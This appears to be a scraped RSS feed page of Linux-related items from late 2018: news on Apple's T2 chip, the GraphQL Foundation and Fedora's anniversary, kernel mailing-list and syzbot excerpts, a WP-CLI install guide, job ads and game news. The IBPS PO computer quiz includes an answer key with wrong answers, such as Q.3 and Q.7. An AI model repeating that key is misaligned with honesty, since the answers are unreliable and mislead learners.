People have found out that you can only install macOS and Windows 10 on Apple's new Macs equipped with the T2 security chip.

By default, Microsoft Windows isn't even bootable on the new Apple systems until enabling support for Windows via the Boot Camp Assistant macOS software. The Boot Camp Assistant will install the Windows Production CA 2011 certificate that is used to authenticate Microsoft bootloaders. But this doesn't setup the Microsoft-approved UEFI certificate that allows verification of code by Microsoft partners, including what is used for signing Linux distributions wishing to have UEFI SecureBoot support for Windows PCs.

Right now, there is no way to run Linux on the new Mac hardware. Even if you disable Secure Boot, you can still only install macOS and Windows 10 - not Linux. Luckily, Linux users don't have to rely on Macs for good hardware anymore - there are tons of Windows laptops out there that offer the same level of quality with better specifications at lower prices that run Linux just fine.


          Linux Format №8 (2018)      Cache   Translate Page      
none
          Introducing the GraphQL Foundation      Cache   Translate Page      

The Linux Foundation is essentially a foundation for foundations, and the newest member to join the ranks is the GraphQL Foundation. We’ve been tracking news and talking about GraphQL for some time now.

Back in 2012 Nick Schrock, Dan Schafer, and Lee Byron got together at Facebook to build the next generation of Facebook’s iOS app powered by a new API for News Feed — what they arrived at was the first version of GraphQL. Lee Byron has this to say about today’s announcement:

Today, GraphQL has been a community project longer than it was a Facebook internal project — which calls for its next evolution.

As one of GraphQL’s co-creators, I’ve been amazed and proud to see it grow in adoption since its open sourcing. Through the formation of the GraphQL Foundation, I hope to see GraphQL become industry standard by encouraging contributions from a broader group and creating a shared investment in vendor-neutral events, documentation, tools, and support.

So who’s involved? Well, GraphQL Foundation is being created in partnership with the Linux Foundation, Facebook, and nearly a dozen other companies. Those “other companies” are likely large scale companies who’ve contributed to or are using GraphQL in production and have a vested interest in its future.


          庆祝 Fedora 15 岁!      Cache   Translate Page      


2003年11月6日,Red Hat 宣布推出 Fedora Core 1,这是 Fedora Project 的首个软件,而这份公告亦标志着一个在 Red Hat 和社区之间协作开发的项目的诞生。


历史

Fedora Project 源于一个名为 fedora.us 的社区主导项目。

Fedora 是一个社区项目,旨在简化 Red Hat 平台上第三方软件的发布和交付。

Fedora.us 推出几个月后,便在其主页发布了重大声明,宣布 Red Hat Linux 正在与 Fedora Linux 合并,而 Fedora Project 亦由此诞生。

当免费的 Red Hat Linux 停止发行后,Fedora 社区便集成到 Red Hat 赞助的 Fedora Project,目标是开发出由社区支持的操作系统。事实上,Fedora Project 除了由志愿者组织外,也有许多 Red Hat 的员工参与开发。Red Hat Enterprise Linux 则取代 Red Hat Linux 成为官方支持的系统版本。

可以理解为 Red Hat Linux 变成了 Fedora Core,而 Fedora.us (or Fedora Linux) 则成了 Fedora Extras。

在 Fedora 7 之前,有 Core 和 Extras 这两个主要的仓库。Fedora Core 仓库包含所有操作系统必需的基本软件包,以及其他随安装 CD/DVD 发行的、由 Red Hat 开发者维护的软件包。Fedora Extras 仓库自 Fedora Core 3 开始加入,包含社区维护的、没有随安装 CD/DVD 发布的软件包。自 Fedora 7 开始,Core 和 Extras 软件仓库被合并,因此该版本在其名称中去掉了Core该软件仓库同样允许社区成员维护的软件包,这在以前是 Red Hat 开发者才可进行的。

Fedora Core 1

15年前的 Linux 软件生态系统看起来与今天非常不同。Fedora Core 1 引入了一些现在听起来可能很熟悉的新软件包:

  • bitstream-vera-fonts

  • dbus

  • epiphany

  • nano

  • rhythmbox

  • yum

从一开始,Fedora 就积极拥抱创新,即使在 2003 年,Fedora Project 也在推进新项目。下面是 Fedora Core 1 发布说明的一部分

  • “CUPS is now the only print spooler provided. During upgrades, if LPRng is installed, it will be replaced by CUPS.”

  • “Fedora Core 1 includes the Native POSIX Thread Library (NPTL), a new implementation of POSIX threads for Linux. This library provides performance improvements and increased scalability.”

  • “Fedora Core 1 now uses a graphical interface while booting.”

默认桌面环境


2003年,Fedora 的默认桌面环境是 GNOME。而 Mozilla Suite 是当时的首选网络浏览器。因为 Mozilla 尚未启动 Firefox 独立浏览器项目,该套件包括一个电子邮件客户端和 usenet 新闻阅读器,虽然 Mozilla 包含了一个电子邮件客户端,但 Fedora 默认使用 Ximian Evolution 作为其电子邮件程序。

还包括以下这些应用

  • OpenOffice.org (formerly StarOffice, and not yet LibreOffice)

  • gAIM (Pidgin would rise in popularity as alternatives to AIM came about, such as Yahoo! Messenger and MSN Messenger)

  • X-Chat

更多关于 Fedora Core 1 的介绍可点此查看,或者下载 Fedora Core 1 的虚拟硬盘镜像体验一番!


          Computer Questions For IBPS PO- 06-11-18      Cache   Translate Page      
Computer Questions For IBPS PO- 06-11-18
Dear Aspirants,

As IBPS has released the official notification of the Common Recruitment Process for selection of personnel for Probationary Officer/ Management Trainee posts and the exam is tentatively scheduled to be held in October / November 2018. Looking at the notification, we have now started subject-wise quizzes for the exam. It will include quizzes of all the subjects- Quantitative Aptitude, English, Reasoning and Computer. All these quizzes will be strictly based on the latest pattern of the IBPS PO exam and will be beneficial for your preparations. So, keep following the quizzes which will provide you a set of 10 questions daily. 

Here, we are providing you important questions of Computer for IBPS PO 2018 exam.

Q.1 What is the technical name for devices that hold files and folders ? 

(1) Documents 

(2) Folders 

(3) Volumes 

(4) File 

(5) None of these 

Q.2 What is the name of the most widely used operating system for personal computers? 

(1) Machintosh 

(2) UNIX 

(3) Windows 

(4) LINUX 

(5) None of these 

Q.3 ------is the process of carring out commands - 

(1) fetching 

(2) executing 

(3) storing 

(4) Decoding 

(5) None of these 

Q.4 A(n)_____is text that you want to be printed at the bottom of the pages. 

(1) header 

(2) endnote 

(3) footnote 

(4) footer 

(5) None of these 

Q.5 What is Data Redundancy ? 

(1) Simplification of Data 

(2) Duplication of Data 

(3) Information of Data 

(4) Creation of New Data 

(5) None of these 

Q.6 In word-processing the task of changing the appearance of a document is- 

(1) Formatting 

(2) Editing 

(3) Proofing 

(4) Inserting 

(5) None of these 

Q.7 A disadvantage of the Laser printer - 

(1) It is quieter than an impact printer 

(2) It is very slow 

(3) The output of a low level quality 

(4) All is true 

(5) None of these 

Q.8 Who designed the first general purpose electronic digital computer ENIAC ? 

(1) Von Newman 

(2) Joseph M Jacquard 

(3) J.P. Eckert and J. W. Mauchley 

(4) M.R. John Brown 

(5) None of these 

Q.9 How many sheets are there in Excel Workbook by default ? 

(1) 2 

(2) 3 

(3) 4 

(4) 5 

(5) None of these 

Q.10 Which page orientation you will select if you wish to print in wide format ? 

(1) Landscape 

(2) Portrait 

(3) Horizontal 

(4) Vertical 

(5) None of these 

ANSWERS- 

Q.1 (3) 

Q.2 (3) 

Q.3 (3) 

Q.4 (4) 

Q.5 (2) 

Q.6 (1) 

Q.7 (4) 

Q.8 (3) 

Q.9 (2) 

Q10 (1)


          [PATCH] rtc: m41t80: Complete error propagation from SMBus calls      Cache   Translate Page      
"Maciej W. Rozycki" writes: (Summary) Complement commit 85d77047c4ea ("drivers/rtc/rtc-m41t80.c: propagate error value from smbus functions") and correct the remaining places that fail to propagate the error code from SMBus calls.
fail to propagate the error code from SMBus calls.
Signed-off-by: Maciej W. 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) linux-rtc-m41t80-err.diff Index: linux-20181008-swarm64-eb/drivers/rtc/rtc-m41t80.c =================================================================== --- linux-20181008-swarm64-eb.orig/drivers/rtc/rtc-m41t80.c +++ linux-20181008-swarm64-eb/drivers/rtc/rtc-m41t80.c @@ -217,7 +217,7 @@ static int m41t80_rtc_read_time(struct d sizeof(buf), buf); ~M41T80_FLAGS_OF)) { + err = i2c_smbus_write_byte_data(client, M41T80_REG_FLAGS, + flags &
          Re: linux-next: Signed-off-by missing for commit in the scsi-fixes ...      Cache   Translate Page      
"Martin K. Petersen" writes: Stephen,
Stephen,
is missing a Signed-off-by from its author and committer. Fixed up, thanks!
Fixed up, thanks!

          INFO: task hung in v4l2_release      Cache   Translate Page      
syzbot writes: (Summary) RSP: 002b:00007ffdaa37b4a0 EFLAGS: 00000293 ORIG_RAX: 0000000000000003 RAX: 0000000000000000 RBX: 0000000000000005 RCX: 0000000000411021 RDX: 0000000000000000 RSI: 0000000000731270 RDI: 0000000000000004 RBP: 0000000000000000 R08: ffffffff8100c717 R09: 00000000abbee66b R10: 00007ffdaa37b3d0 R11: 0000000000000293 R12: 0000000000000000 R13: 0000000000000001 R14: 0000000000000114 R15: 0000000000000004 Showing all locks held in the system: 1 lock held by khungtaskd/1008: #0: 00000000ed38eb10 (rcu_read_lock){....}, at: debug_show_all_locks+0xd0/0x424 kernel/locking/lockdep.c:4379 2 locks held by kworker/0:2/2895: #0: 000000002e0c0567 ((wq_completion)"events"){+.+.}, at: __write_once_size include/linux/compiler.h:209 [inline] #0: 000000002e0c0567 ((wq_completion)"events"){+.+.}, at: arch_atomic64_set arch/x86/include/asm/atomic64_64.h:34 [inline] #0: 000000002e0c0567 ((wq_completion)"events"){+.+.}, at: atomic64_set include/asm-generic/atomic-instrumented.h:855 [inline] #0: 000000002e0c0567 ((wq_
          WARNING: ODEBUG bug in tls_sw_free_resources_tx      Cache   Translate Page      
syzbot writes: (Summary) *** DEADLOCK *** 3 locks held by syz-executor5/17315: #0: 0000000097b82416 (&sb->s_type->i_mutex_key#11){+.+.}, at: inode_lock include/linux/fs.h:757 [inline] #0: 0000000097b82416 (&sb->s_type->i_mutex_key#11){+.+.}, at: __sock_release+0x8b/0x250 net/socket.c:578 #1: 00000000ea6832e0 (sk_lock-AF_INET6){+.+.}, at: lock_sock include/net/sock.h:1492 [inline] #1: 00000000ea6832e0 (sk_lock-AF_INET6){+.+.}, at: tls_sk_proto_close+0xf5/0x750 net/tls/tls_main.c:262 #2: 000000008f462fd4 (&obj_hash[i].lock){-.-.}, at: __debug_check_no_obj_freed lib/debugobjects.c:777 [inline] #2: 000000008f462fd4 (&obj_hash[i].lock){-.-.}, at: debug_check_no_obj_freed+0x17a/0x58d lib/debugobjects.c:818 stack backtrace: CPU: 1 PID: 17315 Comm: syz-executor5 Not tainted 4.19.0+ #281 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 Call Trace: __dump_stack lib/dump_stack.c:77 [inline] dump_stack+0x244/0x39d lib/dump_stack.c:113 print
          BUG: spinlock cpu recursion on CPU, syz-executor      Cache   Translate Page      
syzbot writes: (Summary) BUG: spinlock cpu recursion on CPU#0, syz-executor0/8023 lock: 0xffffc900045ea000, .magic: dead4ead, .owner: <none>/-1, .owner_cpu: 0 CPU: 0 PID: 8023 Comm: syz-executor0 Not tainted 4.20.0-rc1+ #99 kobject: 'kvm' (00000000968c974f): kobject_uevent_env Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 kobject: 'kvm' (00000000968c974f): kobject_uevent_env Call Trace: __dump_stack lib/dump_stack.c:77 [inline] dump_stack+0x244/0x39d lib/dump_stack.c:113 spin_dump.cold.3+0x81/0xe7 kernel/locking/spinlock_debug.c:67 kobject: 'kvm' (00000000968c974f): fill_kobj_path: path = '/devices/virtual/misc/kvm' spin_bug kernel/locking/spinlock_debug.c:75 [inline] debug_spin_lock_before kernel/locking/spinlock_debug.c:85 [inline] do_raw_spin_lock+0x26a/0x350 kernel/locking/spinlock_debug.c:112 kobject: 'loop2' (000000000bdb293a): kobject_uevent_env __raw_spin_lock include/linux/spinlock_api_smp.h:143 [inline] _raw_spin_lock+0x35/0x40 kernel/locking/spinloc
          Re: [PATCH] apparmor: Change to use DEFINE_SHOW_ATTRIBUTE macro      Cache   Translate Page      
kbuild test robot writes: (Summary) Yet something to improve:
[auto build test ERROR on security/next-testing]
[also build test ERROR on v4.20-rc1 next-20181106]
[if your patch is applied to the wrong git tree, please drop us a note to help improve the system] [if your patch is applied to the wrong git tree, please drop us a note to help improve the system] url: https://github.com/0day-ci/linux/commits/Yangtao-Li/apparmor-Change-to-use-DEFINE_SHOW_ATTRIBUTE-macro/20181107-004056 base: https://git.kernel.org/pub/scm/linux/kernel/git/jmorris/linux-security.git next-testing config: ia64-allmodconfig (attached as .config)
compiler: ia64-linux-gcc (GCC) 8.1.0
reproduce:
wget https://raw.githubusercontent.co
          Re: [RFC v2 00/14] kunit: introduce KUnit, the Linux kernel unit t ...      Cache   Translate Page      
Brendan Higgins writes: (Summary) You, me, and Greg had talked about this elsewhere, in summary, I am trying to do in-tree unit testing, so tests should live side-by-side with the code it tests, and the tests run at the same level of abstraction as the code that is under test. I agree that something like this example is trying to be a unit test, but the kselftest infrastructure is built around the idea of booting kernels and running tests against them;
          Univerzális memória-kártya olvasó 1 Ft NMÁ!!!!!!!! - Jelenlegi ára: 1 Ft      Cache   Translate Page      
Univerzális USB 2. 0 Memória kártya-olvasó
480 Mb/s sebesség
Kompatibilis: USB 1. 1 és 2. 0
4 kártya foglalat
Támogatott kártya típusok: Micro MS/ M2/ SD/ MMC/ SDHC/DV/MS DUO/ MS PRO DUO/ Micro SD/T-Flash
Kompatibilis operációs rendszerek: Windows 7/VISTA/XP/2000/ME/98SE/98, Mac OS X 9. 0 és Linux 2. 4 vagy újabb verziói
Vékony kialakítás, kompakt méret
Plug & Play: behelyezés után egyből működik
Támogatott kártyaméret: max 32 Gb
Anyaga: műanyag
Méret: 66 x 21 x 16 mm
Súly: 14 g
Szín: véletlenszerű
A termékek külföldről érkeznek, emiatt a szállítási idő 15-30 munkanap, kérem mindenki ennek tudatában licitáljon!
Univerzális memória-kártya olvasó 1 Ft NMÁ!!!!!!!!
Jelenlegi ára: 1 Ft
Az aukció vége: 2018-11-07 07:11
          Univerzális memória-kártya olvasó 1 Ft NMÁ!!!!!!!! - Jelenlegi ára: 1 Ft      Cache   Translate Page      
Univerzális USB 2. 0 Memória kártya-olvasó
480 Mb/s sebesség
Kompatibilis: USB 1. 1 és 2. 0
4 kártya foglalat
Támogatott kártya típusok: Micro MS/ M2/ SD/ MMC/ SDHC/DV/MS DUO/ MS PRO DUO/ Micro SD/T-Flash
Kompatibilis operációs rendszerek: Windows 7/VISTA/XP/2000/ME/98SE/98, Mac OS X 9. 0 és Linux 2. 4 vagy újabb verziói
Vékony kialakítás, kompakt méret
Plug & Play: behelyezés után egyből működik
Támogatott kártyaméret: max 32 Gb
Anyaga: műanyag
Méret: 66 x 21 x 16 mm
Súly: 14 g
Szín: véletlenszerű
A termékek külföldről érkeznek, emiatt a szállítási idő 15-30 munkanap, kérem mindenki ennek tudatában licitáljon!
Univerzális memória-kártya olvasó 1 Ft NMÁ!!!!!!!!
Jelenlegi ára: 1 Ft
Az aukció vége: 2018-11-07 07:11
          Re: System not booting since dm changes? (was Linux 4.20-rc1)      Cache   Translate Page      
Michael Ellerman writes: Mike Snitzer <snitzer@redhat.com> writes:
CONFIG_SCSI_MQ_DEFAULT in your kernel config)
Thanks.
Thanks.
Looks like CONFIG_SCSI_MQ_DEFAULT is default y, so new configs should pick that up by default. We must have had an old .config that didn't get that update.
that update.
cheers
cheers
cheers

          Re: [driver-core PATCH v5 5/9] driver core: Establish clear order ...      Cache   Translate Page      
Alexander Duyck writes: (Summary) On Tue, Nov 6, 2018 at 3:51 PM Bart Van Assche <bvanassche@acm.org> wrote: Bart.
It isn't a bug. It is pointing out the same thing you did. I didn't document the async_probe value so it added a warning to the list. document the async_probe value so it added a warning to the list. include/linux/device.h:1056: warning: Function parameter or member 'async_probe' not described in 'device' I'll fix it for the next version.
I'll fix it for the next version.
- Alex
- Alex
- Alex

          Univerzális memória-kártya olvasó 1 Ft NMÁ!!!!!!!! - Jelenlegi ára: 1 Ft      Cache   Translate Page      
Univerzális USB 2. 0 Memória kártya-olvasó
480 Mb/s sebesség
Kompatibilis: USB 1. 1 és 2. 0
4 kártya foglalat
Támogatott kártya típusok: Micro MS/ M2/ SD/ MMC/ SDHC/DV/MS DUO/ MS PRO DUO/ Micro SD/T-Flash
Kompatibilis operációs rendszerek: Windows 7/VISTA/XP/2000/ME/98SE/98, Mac OS X 9. 0 és Linux 2. 4 vagy újabb verziói
Vékony kialakítás, kompakt méret
Plug & Play: behelyezés után egyből működik
Támogatott kártyaméret: max 32 Gb
Anyaga: műanyag
Méret: 66 x 21 x 16 mm
Súly: 14 g
Szín: véletlenszerű
A termékek külföldről érkeznek, emiatt a szállítási idő 15-30 munkanap, kérem mindenki ennek tudatában licitáljon!
Univerzális memória-kártya olvasó 1 Ft NMÁ!!!!!!!!
Jelenlegi ára: 1 Ft
Az aukció vége: 2018-11-07 07:11
          Re: [PATCH] riscv: add missing vdso_install target      Cache   Translate Page      
Palmer Dabbelt writes: (Summary) On Mon, 05 Nov 2018 06:35:37 PST (-0800), david.abdurachmanov@gmail.com wrote: all: vmlinux
While this doesn't smell like it should be an arch-specific thing, it looks like everyone else has a copy and they're all slightly different so it'd probably be more complexity to merge them than duplicate them. probably be more complexity to merge them than duplicate them. I'll take this into my PR for next week.
I'll take this into my PR for next week.
Thanks!
Thanks!
Thanks!

          Time for Net Giants to Pay Fairly for the Open Source on Which They Depend      Cache   Translate Page      
money

Net giants depend on open source: so where's the gratitude?

Licensing lies at the heart of open source. Arguably, free software began with the publication of the GNU GPL in 1989. And since then, open-source projects are defined as such by virtue of the licenses they adopt and whether the latter meet the Open Source Definition. The continuing importance of licensing is shown by the periodic flame wars that erupt in this area. Recently, there have been two such flarings of strong feelings, both of which raise important issues.

First, we had the incident with Lerna, "a tool for managing JavaScript projects with multiple packages". It came about as a result of the way the US Immigration and Customs Enforcement (ICE) has been separating families and holding children in cage-like cells. The Lerna core team was appalled by this behavior and wished to do something concrete in response. As a result, it added an extra clause to the MIT license, which forbade a list of companies, including Microsoft, Palantir, Amazon, Motorola and Dell, from being permitted to use the code:

For the companies that are known supporters of ICE: Lerna will no longer be licensed as MIT for you. You will receive no licensing rights and any use of Lerna will be considered theft. You will not be able to pay for a license, the only way that it is going to change is by you publicly tearing up your contracts with ICE.

Many sympathized with the feelings about the actions of the ICE and the intent of the license change. However, many also pointed out that such a move went against the core principles of both free software and open source. Freedom 0 of the Free Software Definition is "The freedom to run the program as you wish, for any purpose." Similarly, the Open Source Definition requires "No Discrimination Against Persons or Groups" and "No Discrimination Against Fields of Endeavor". The situation is clear cut, and it didn't take long for the Lerna team to realize their error, and they soon reverted the change:


          Linux in Windows 10 October update: This is how we've improved WSL, says Microsoft      Cache   Translate Page      
Microsoft makes Notepad friendlier for developers working with Linux and Unix line endings.
          Re: [Intel-gfx] linux-next: Signed-off-by missing for commit in th ...      Cache   Translate Page      
Manasi Navare writes: (Summary) On Tue, Nov 06, 2018 at 04:00:34PM -0800, Rodrigo Vivi wrote: It seems the tag "Suggested-by:" tricked out our maintainer tools. Hmm yea that makes sense since it did have suggested-by: me (committer) so it skipped adding my sign-off.
so it skipped adding my sign-off.
Thanks for catching this and fixing it in tools.
Thanks for catching this and fixing it in tools.
Manasi
Manasi
https://lists.freedesktop.org/mailman/listinfo/intel-gfx https://lists.freedesktop.org/mailman/listinfo/intel-gfx
          Re: [Intel-gfx] linux-next: Signed-off-by missing for commit in th ...      Cache   Translate Page      
Rodrigo Vivi writes: (Summary) On Wed, Nov 07, 2018 at 06:59:29AM +1100, Stephen Rothwell wrote: is missing a Signed-off-by from its committer.
It seems the tag "Suggested-by:" tricked out our maintainer tools. then ----- I will send a patch to our tools to spell signed-off-by directly. > > -- > Cheers, > Stephen Rothwell > _______________________________________________ > Intel-gfx mailing list > Intel-gfx@lists.freedesktop.org >
          Ingénieur Systèmes Linux F/H - Sopra Steria - Toulouse      Cache   Translate Page      
Sopra Steria, fort de près de 42 000 collaborateurs dans plus de 20 pays, propose l'un des portefeuilles d'offres les plus complets du marché : conseil, intégration de systèmes, édition de solutions métier, infrastructure management et business process services. En forte croissance, le Groupe accueillera 3 100 talents en 2018 en France pour participer à ses projets d'envergure sur l'ensemble de ses métiers. L'émergence du Cloud, de l'internet des objets et du Big Data pousse nos...
          Ingénieur Systèmes Linux F/H - Sopra Steria - Toulouse      Cache   Translate Page      
Sopra Steria, fort de près de 42 000 collaborateurs dans plus de 20 pays, propose l'un des portefeuilles d'offres les plus complets du marché : conseil, intégration de systèmes, édition de solutions métier, infrastructure management et business process services. En forte croissance, le Groupe accueillera 3 100 talents en 2018 en France pour participer à ses projets d'envergure sur l'ensemble de ses métiers. L'émergence du Cloud, de l'internet des objets et du Big Data pousse nos...
          Amazon Linux: supporto Java fino al 2023      Cache   Translate Page      

Amazon estende il supporto gratuito alle versioni di OpenJDK che Oracle dismetterà entro il 2020.

Leggi Amazon Linux: supporto Java fino al 2023


          IT Support Specialist - Rambus - San Francisco, CA      Cache   Translate Page      
Business Unit Specific Support:. Collaboration Tool support (Skype for Business, Webex, etc). Deep knowledge of Unix/Linux internals administration,...
From Bank of Ireland - Wed, 19 Sep 2018 00:34:49 GMT - View all San Francisco, CA jobs
          An Introductory Guide to Managing WordPress with WP-CLI      Cache   Translate Page      

This article provides an introductory guide to WP-CLI, a command-line tool that was created to make developers’ lives easier, allowing them to manage a WordPress site through the command line rather than through the usual admin interface.

WP-CLI was created by Daniel Bachhuber over a decade ago. Since then, it’s become an indispensable tool in every advanced WordPress developer’s arsenal — “deployed and relied upon by almost every major user of WordPress”, according to Matt Mullenweg. Since 2016, WP-CLI has been an official WordPress CLI tool.

WP-CLI is used for installing and setting up a WordPress website, changing its options, administering users, and a host of other things. It can be leveraged to significantly speed up developers’ workflows.

WP-CLI comes as a phar file — short for PHP Archive. It’s a standard for packaging multiple PHP files and other resources as a single application — for simpler distribution and installation.

Installation

WP-CLI presumes, obviously, that we have access to the system shell. This will be pretty straightforward on Linux and macOS systems — particularly on servers — as WordPress is served almost universally from Linux machines. If we have dedicated server hosting, or cloud hosting like AWS, Alibaba Cloud, etc., or if we’re using a VPS from Digital Ocean, Vultr, Linode and the like, SSH comes as a default access option, but these days many shared hosts offer SSH access options. (Some might even come with WP-CLI preinstalled.)

For Windows users, WP-CLI can be installed via Composer, but we recommend readers get themselves acquainted with Windows Subsystem for Linux, because it makes it possible to have a native Linux environment available, along with Bash, package manager like APT, etc. WordPress is a PHP app, and PHP’s native environment is Linux.

Further code samples presume we’re using Linux or a Unix-type system.

To fetch the WP-CLI phar archive, we usecurl or wget:

curl -O https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar  

This downloads our archive to the current directory. Then we make it executable:

chmod +x wp-cli.phar

We them move it so it’s available as a wp command:

sudo mv wp-cli.phar /usr/local/bin/wp

Now we have a wp command available:

[video width="600" height="" mp4="https://dab1nmslvvntp.cloudfront.net/wp-content/uploads/2018/11/1541465872wp.mp4"][/video]

Now, upon typing the wp command, it displays all the options for us, and possible parameters. One caveat: if we’re running as the root user, we need to add --allow-root to our commands:

Adding --allow-root to enable running as the root user

Now that we have it set up, we can explore the commands, and possible usage scenarios.

WP-CLI Commands

WP-CLI aims to offer a fast alternative to the WordPress web admin interface. There are chunks of code or functionality that offer simple, precise interfaces for performing complex tasks. Beside the bundled commands, WP-CLI defines an API for integrating third-party commands — WP_CLI::add_command(). These can be distributed either as standalone packages, or as part of WordPress plugins or themes.

In this guide, we’ll review bundled commands — those that come with the default WP-CLI installation — and some more notable third-party commands.

Commands can come as basic, one-argument commands like wp somecommand, or as subcommands under the base command namespace, such as wp somecommand subcommand.

wp core

The wp core subcommand is a command/namespace that consists of sucommands that deal with WordPress core — so we can download, install, update, convert to multisite and get information about our WordPress core version:

  • wp core download will download the latest version of WordPress into the current directory
  • wp core install runs the standard WordPress installation process, with options like --url=somewebsite.com, --title=SomeWebsite, --admin_user=someusername, --admin_password=somepassword and --admin_email=some@email.com
  • wp core multisite-install installs a new multisite WordPress installation, and wp core multisite-convert converts a regular installation into multisite.
  • wp core update will update WordPress to a newer version, and wp core update-db will update the database.

More details on wp core can be found in the documentation.

WP-CLI really shines when we combine its commands in Bash scripts, so we can combine, for example, wp core download and wp core install into a single Bash command and streamline the installation.

Worth noting here is that before we run the installation, we need to create a wp-config.php file, with database credentials and other details needed for the installation.

WP-CLI provides a wp config create command for this.

The post An Introductory Guide to Managing WordPress with WP-CLI appeared first on SitePoint.


          Comentario en Ya está lista la nueva actualización de Neptune 5.6 por Cristóbal      Cache   Translate Page      
Es justamente el cáncer de linux, taaaaanta distrito que el usuario común y corriente se agobia, es por eso que linux no puede triunfar donde su creador quiere que triunfe...
          Comentario en Llega la nueva versión de Manjaro Linux 18.0 con mayor facilidad de uso por Miguel Mayol i Tur      Cache   Translate Page      
Enhorabuena por el artículo. Manjaro es 100% Rolling pero con 15 días de retraso respecto de arch por tanto semi Bleeding Edge - A la última - pues se pueden configurar los repositorios testing para ser Bleeding Edge pero no es por defecto- Echo en falta, casi siempre que se escribe sobre los núcleos en tiempo real - RT kernels - que se mencione que son los indicados para edición y reproducción multimedia. Es decir para músicos, melómanos y videoartistas.
          Comentario en El gigante de los videojuegos EA ha creado Halcyon con soporte para Vulkan y Linux por Gregorio Ros      Cache   Translate Page      
Esto sería un gran aporte para la cartera de titulos triple AAA, EA no es moco de pavo precisamente.
          Planet Computers introduces the Cosmo Communicator - Cnews.cz      Cache   Translate Page      

Cnews.cz


Cnews.cz
Tvůrci vám opět nechají volnost a místo operačního systému Googlu můžete použít i Sailfish OS nebo Debian Linux. Android v nejnovější verzi Pie ale bude výchozím a Planet Computers pro něj vyvíjejí i vlastní kancelářské aplikace pro správu e-mailů, ...

Cosmo Communicator: Miniaturní počítač s Androidem a telefon v jednom zařízení




          Systems Administrator - Microsoft, Linux, Red Hat (Top Secret Clearance Required) - Melbourne, FL      Cache   Translate Page      
FL-Melbourne, Job Description: AppleOne Employment is looking for a Systems Administrator for a Permanent/Direct-Hire opportunity. Relocation assistance provided. $80K - $90K depending on experience. Melbourne, FL System Administrator III will manage the IT and Cyber-Security functions of unclassified and classified systems. Requirements: ? B.S. degree in Information Systems discipline ? 5+ years of experience
          Senior Applications Developer - Agile5 Technologies, Inc. - Clarksburg, WV      Cache   Translate Page      
Java, Struts, Spring Framework, web applications, web services, SOAP, REST, JavaScript libraries, JQuery, Linux, Dojo, Postgres....
From Agile5 Technologies, Inc. - Fri, 02 Nov 2018 03:03:22 GMT - View all Clarksburg, WV jobs
          Applications Developer (Senior) - Military Talent Partners - Clarksburg, WV      Cache   Translate Page      
Experience with Java, Struts or Spring Framework, Web Applications, Web Services, SOAP, REST, JavaScript libraries, JQuery, Linux, Dojo Toolkit, Postgres....
From Indeed - Tue, 30 Oct 2018 15:18:10 GMT - View all Clarksburg, WV jobs
          Applications Developer (Senior) - Stellar Peak - Clarksburg, WV      Cache   Translate Page      
Experience with Java, Struts or Spring Framework, Web Applications, Web Services, SOAP, REST, JavaScript libraries, JQuery, Linux, Dojo Toolkit....
From Stellar Peak - Sat, 27 Oct 2018 07:05:43 GMT - View all Clarksburg, WV jobs
          Applications Developer (Mid-Level) - Stellar Peak - Clarksburg, WV      Cache   Translate Page      
Experience with Java, Struts or Spring Framework, Web Applications, Web Services, SOAP, REST, JavaScript libraries, JQuery, Linux, Dojo Toolkit....
From Stellar Peak - Sat, 27 Oct 2018 07:05:41 GMT - View all Clarksburg, WV jobs
          Senior Applications Developer - Military Talent Partners - Clarksburg, WV      Cache   Translate Page      
Experience with Java, Struts or Spring Framework, Web Applications, Web Services, SOAP, REST, JavaScript libraries, JQuery, Linux, Dojo Toolkit, Postgres....
From Indeed - Wed, 10 Oct 2018 20:25:57 GMT - View all Clarksburg, WV jobs
          Senior Applications Developer - ManTech International Corporation - Clarksburg, WV      Cache   Translate Page      
Experience with Java, Struts or Spring Framework, Web Applications, Web Services, SOAP, REST, JavaScript libraries, JQuery, Linux, Dojo Toolkit, Postgres....
From ManTech International Corporation - Thu, 04 Oct 2018 21:41:12 GMT - View all Clarksburg, WV jobs
          Applications Developer (Senior) - ManTech International Corporation - Clarksburg, WV      Cache   Translate Page      
Experience with Java, Struts or Spring Framework, Web Applications, Web Services, SOAP, REST, JavaScript libraries, JQuery, Linux, Dojo Toolkit, Postgres....
From ManTech International Corporation - Fri, 21 Sep 2018 15:41:43 GMT - View all Clarksburg, WV jobs
          Applications Developer - ManTech International Corporation - Clarksburg, WV      Cache   Translate Page      
Experience with Java, Struts or Spring Framework, Web Applications, Web Services, SOAP, REST, JavaScript libraries, JQuery, Linux, Dojo Toolkit, Postgres....
From ManTech International Corporation - Wed, 12 Sep 2018 21:42:03 GMT - View all Clarksburg, WV jobs
          PostgreSQL Database Administrator - Upgrade - Montreal, WI      Cache   Translate Page      
Solid Linux fundamentals including kernel and OS tuning, as they relate to DB performance and security. Upgrade is a consumer credit platform that is changing...
From Upgrade - Wed, 22 Aug 2018 22:02:31 GMT - View all Montreal, WI jobs
          Games: Meltys Quest, Monstrum, Book of Demons      Cache   Translate Page      
  • Meltys Quest, a completely uncensored 2D RPG full of sex is now available on Linux

    The Linux version actually arrived back in September, although we missed it since it's not really the type of game I tend to follow. Only three days before this, the developer put up a patch that removed censoring with no external mods needed so you can see cartoon sex in all it's, uh, glory? It features, you guessed it—sex. A lot of sex too, so much sex I can't believe how many times the word sex will be in this article.

  • GOG now has the horror game Monstrum with a Linux build, it's pretty good

    Monstrum is an interesting one, a horror game with some random generation, one of three monsters each time you play and it's quite freaky.

    What makes the game different to a lot of survival horror titles, is that the environment changes each time you play. Naturally that also means items will be in different locations and you don't know which monster you will be facing when going in. It's a survival escape adventure, with your task being to find a way to get off the ship to safety and there's multiple ways to do so.

  • Book of Demons no longer getting a native Linux port, developer plans on 'supporting' Steam Play

    Book of Demons [Steam], a dungeon crawling hack and slash with deck-building will no longer get a native Linux port. Steam Play is part of the reason.

    It won't be the last game to do this I'm sure. At least in this case, they aren't pulling support for an already released game like Human: Fall Flat as Book of Demons didn't have a public Linux version. Anyway, writing on the Steam forum the developer noted a few vague issues they were having.

    Things like "We had as many different issues with the build as testers. With each flavor of Linux came different issues." along with "Right now everything indicates that Linux port would be very high maintenance.". I always find these types of statements highly unhelpful, unless they actually say why that is. Let's be clear on this again too, you do not need to support all Linux distributions, support the most popular.


